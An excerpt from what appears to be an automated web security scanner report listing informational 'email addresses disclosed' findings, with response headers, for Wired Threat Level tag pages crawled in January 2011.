<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.119. http://www.wired.com/threatlevel/tag/hack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hack/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:09:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:18 GMT
Date: Wed, 12 Jan 2011 15:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.120. http://www.wired.com/threatlevel/tag/hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hacking/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:14 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:19 GMT
Date: Wed, 12 Jan 2011 15:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.121. http://www.wired.com/threatlevel/tag/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/intellectual-property/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:21:42 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:26 GMT
Date: Wed, 12 Jan 2011 15:34:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.122. http://www.wired.com/threatlevel/tag/mpaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/mpaa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:20:07 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=433
Expires: Wed, 12 Jan 2011 15:41:44 GMT
Date: Wed, 12 Jan 2011 15:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.123. http://www.wired.com/threatlevel/tag/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/nsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:50:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:32 GMT
Date: Wed, 12 Jan 2011 15:34:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.124. http://www.wired.com/threatlevel/tag/obama/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/obama/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:17 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=452
Expires: Wed, 12 Jan 2011 15:42:06 GMT
Date: Wed, 12 Jan 2011 15:34:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.125. http://www.wired.com/threatlevel/tag/piracy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/piracy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:19 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:52 GMT
Date: Wed, 12 Jan 2011 15:34:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.126. http://www.wired.com/threatlevel/tag/pirate-bay-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:16:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:12 GMT
Date: Wed, 12 Jan 2011 15:35:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.127. http://www.wired.com/threatlevel/tag/pirate-bay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:51:58 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=472
Expires: Wed, 12 Jan 2011 15:42:59 GMT
Date: Wed, 12 Jan 2011 15:35:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.128. http://www.wired.com/threatlevel/tag/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/politics/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.129. http://www.wired.com/threatlevel/tag/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/privacy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:20:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=434
Expires: Wed, 12 Jan 2011 15:42:38 GMT
Date: Wed, 12 Jan 2011 15:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.130. http://www.wired.com/threatlevel/tag/riaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/riaa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:24 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:29 GMT
Date: Wed, 12 Jan 2011 15:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.131. http://www.wired.com/threatlevel/tag/segvec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/segvec/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:26 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.132. http://www.wired.com/threatlevel/tag/supreme-court/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/supreme-court/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:27 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:38 GMT
Date: Wed, 12 Jan 2011 15:35:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.133. http://www.wired.com/threatlevel/tag/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/surveillance/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:39 GMT
Date: Wed, 12 Jan 2011 15:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.134. http://www.wired.com/threatlevel/tag/tjx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tjx/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
